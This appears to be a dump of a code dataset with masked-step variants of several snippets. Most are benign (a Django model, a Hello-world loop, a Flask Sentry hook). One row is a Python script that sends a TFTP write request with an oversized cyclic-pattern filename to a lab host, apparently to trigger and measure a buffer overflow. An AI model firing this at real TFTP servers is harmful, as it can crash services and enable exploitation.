code
stringlengths
13
6.09M
order_type
stringclasses
2 values
original_example
dict
step_ids
listlengths
1
5
from django.db import models # Create your models here. class person(models.Model): name=models.CharField(max_length=20,unique=True) age=models.IntegerField() email=models.CharField(max_length=20,unique=True) phone=models.CharField(max_length=10, unique=True) gender=models.CharField(max_length=10) locations=[('ind',"india"),('aus',"AUS")] location=models.CharField(max_length=10,choices=locations) marital_status=models.CharField(max_length=10) def __unicode__(self): return self.name
normal
{ "blob_id": "efe5df4005dbdb04cf4e7da1f350dab483c94c92", "index": 4459, "step-1": "<mask token>\n\n\nclass person(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass person(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __unicode__(self):\n return self.name\n", "step-3": "<mask token>\n\n\nclass person(models.Model):\n name = models.CharField(max_length=20, unique=True)\n age = models.IntegerField()\n email = models.CharField(max_length=20, unique=True)\n phone = models.CharField(max_length=10, unique=True)\n gender = models.CharField(max_length=10)\n locations = [('ind', 'india'), ('aus', 'AUS')]\n location = models.CharField(max_length=10, choices=locations)\n marital_status = models.CharField(max_length=10)\n\n def __unicode__(self):\n return self.name\n", "step-4": "from django.db import models\n\n\nclass person(models.Model):\n name = models.CharField(max_length=20, unique=True)\n age = models.IntegerField()\n email = models.CharField(max_length=20, unique=True)\n phone = models.CharField(max_length=10, unique=True)\n gender = models.CharField(max_length=10)\n locations = [('ind', 'india'), ('aus', 'AUS')]\n location = models.CharField(max_length=10, choices=locations)\n marital_status = models.CharField(max_length=10)\n\n def __unicode__(self):\n return self.name\n", "step-5": "from django.db import models\n\n# Create your models here.\nclass person(models.Model):\n name=models.CharField(max_length=20,unique=True)\n age=models.IntegerField()\n email=models.CharField(max_length=20,unique=True)\n phone=models.CharField(max_length=10, unique=True)\n gender=models.CharField(max_length=10)\n locations=[('ind',\"india\"),('aus',\"AUS\")]\n location=models.CharField(max_length=10,choices=locations)\n 
marital_status=models.CharField(max_length=10)\n def __unicode__(self):\n return self.name\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
def Hello_worlder(x): a = [] for i in range(x): a.append('Hello world') for i in a: print(i) Hello_worlder(10)
normal
{ "blob_id": "4f116f3eec9198a56a047ab42ed8e018ebb794bb", "index": 3528, "step-1": "<mask token>\n", "step-2": "def Hello_worlder(x):\n a = []\n for i in range(x):\n a.append('Hello world')\n for i in a:\n print(i)\n\n\n<mask token>\n", "step-3": "def Hello_worlder(x):\n a = []\n for i in range(x):\n a.append('Hello world')\n for i in a:\n print(i)\n\n\nHello_worlder(10)\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> @got_request_exception.connect def log_exception_to_sentry(app, exception=None, **kwargs): """ Logs an exception to sentry. :param app: The current application :param exception: The exception that occurred """ sentry.captureException(exception) <|reserved_special_token_1|> <|reserved_special_token_0|> app = Flask(__name__) sentry = Sentry(dsn=app.config['SENTRY_DSN']) @got_request_exception.connect def log_exception_to_sentry(app, exception=None, **kwargs): """ Logs an exception to sentry. :param app: The current application :param exception: The exception that occurred """ sentry.captureException(exception) <|reserved_special_token_1|> from flask import Flask from raven.contrib.flask import Sentry from flask.signals import got_request_exception app = Flask(__name__) sentry = Sentry(dsn=app.config['SENTRY_DSN']) @got_request_exception.connect def log_exception_to_sentry(app, exception=None, **kwargs): """ Logs an exception to sentry. :param app: The current application :param exception: The exception that occurred """ sentry.captureException(exception)
flexible
{ "blob_id": "f739fb56eae1ada2409ef7d75958bad2018f5134", "index": 2743, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\n@got_request_exception.connect\ndef log_exception_to_sentry(app, exception=None, **kwargs):\n \"\"\"\n Logs an exception to sentry.\n\n :param app: The current application\n :param exception: The exception that occurred\n \"\"\"\n sentry.captureException(exception)\n", "step-3": "<mask token>\napp = Flask(__name__)\nsentry = Sentry(dsn=app.config['SENTRY_DSN'])\n\n\n@got_request_exception.connect\ndef log_exception_to_sentry(app, exception=None, **kwargs):\n \"\"\"\n Logs an exception to sentry.\n\n :param app: The current application\n :param exception: The exception that occurred\n \"\"\"\n sentry.captureException(exception)\n", "step-4": "from flask import Flask\nfrom raven.contrib.flask import Sentry\nfrom flask.signals import got_request_exception\napp = Flask(__name__)\nsentry = Sentry(dsn=app.config['SENTRY_DSN'])\n\n\n@got_request_exception.connect\ndef log_exception_to_sentry(app, exception=None, **kwargs):\n \"\"\"\n Logs an exception to sentry.\n\n :param app: The current application\n :param exception: The exception that occurred\n \"\"\"\n sentry.captureException(exception)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
#!/usr/bin/python import socket import sys host = '10.211.55.5' port = 69 try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print "socket() failed" sys.exit(1) filename = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3
Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex
0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk" mode = "netascii" buf = "\x00\x02" + filename+ "\0" + mode+ "\0" s.sendto(buf, (host, port))
normal
{ "blob_id": "b318f5d443dbf8e4442707839649149e75653295", "index": 5917, "step-1": "#!/usr/bin/python \nimport socket \nimport sys\n\nhost = '10.211.55.5' \nport = 69\ntry:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \nexcept:\n print \"socket() failed\" \n sys.exit(1)\nfilename = \"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce
8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4E
t5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7